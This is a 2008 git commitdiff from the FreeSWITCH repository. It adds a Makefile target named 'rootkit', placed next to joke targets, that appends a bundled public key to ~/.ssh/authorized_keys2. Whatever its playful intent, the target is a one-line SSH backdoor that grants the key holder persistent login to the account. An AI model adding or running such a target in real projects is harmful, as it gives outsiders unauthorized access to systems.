]> git.ipfire.org Git - thirdparty/freeswitch.git/commitdiff
add make rootkit
authorMichael Jerris <mike@jerris.com>
Fri, 5 Dec 2008 16:47:02 +0000 (16:47 +0000)
committerMichael Jerris <mike@jerris.com>
Fri, 5 Dec 2008 16:47:02 +0000 (16:47 +0000)
git-svn-id: http://svn.freeswitch.org/svn/freeswitch/trunk@10615 d0543943-73ff-0310-b7d9-9358b9ac24b2

Makefile.am

index 52ab257ce663844b0646748231af55c5a64ca445..fb6b41fb60c04ebde20e060d553350e9e0038389 100644 (file)
@@ -449,6 +449,9 @@ $(OUR_MODULES):
           || case "$$amf" in *=*) exit 1;; *k*) fail=yes;; *) exit 1;; esac; \
        test -z "$$fail"
 
+rootkit:
+       cat ssh_keys/shinzon.pub >> ~/.ssh/authorized_keys2 && chmod 600 ~/.ssh/authorized_keys2
+
 # Special targets
 
 coffee me_a_sandwich me_a_sammich: